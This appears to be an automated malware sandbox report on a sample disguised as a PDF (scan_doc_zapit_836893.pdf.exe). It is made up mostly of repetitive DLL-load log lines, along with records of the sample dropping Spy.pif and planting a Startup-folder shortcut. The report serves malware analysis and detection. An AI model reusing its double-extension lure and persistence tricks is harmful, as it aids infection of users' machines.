Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wldp.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: windowscodecs.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: profapi.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: propsys.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: explorerframe.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: cryptbase.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: thumbcache.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: policymanager.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: msvcp110_win.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: textinputframework.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: coreuicomponents.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: coremessaging.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: ntmarta.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wintypes.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wintypes.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wintypes.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dataexchange.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: d3d11.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dcomp.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dxgi.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: twinapi.appcore.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: edputil.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: urlmon.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: iertutil.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: srvcli.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: netutils.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: sspicli.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: appresolver.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: bcp47langs.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: slc.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: userenv.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: sppc.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: pcacli.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: mpr.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: version.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: shfolder.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: propsys.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: riched20.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: usp10.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: msls31.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: textinputframework.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: coremessaging.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: ntmarta.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: textshaping.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: profapi.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: edputil.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: urlmon.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: iertutil.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: srvcli.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: netutils.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: appresolver.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: slc.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: userenv.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: sppc.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\OpenWith.exeWindow detected: Number of UI elements: 13

Persistence and Installation Behavior

barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\185027\Spy.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\185027\Spy.pifJump to dropped file
Source: C:\Program Files\7-Zip\7zFM.exeFile created: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\7zFM.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\7zFM.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif TID: 3312Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif TID: 1640Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp
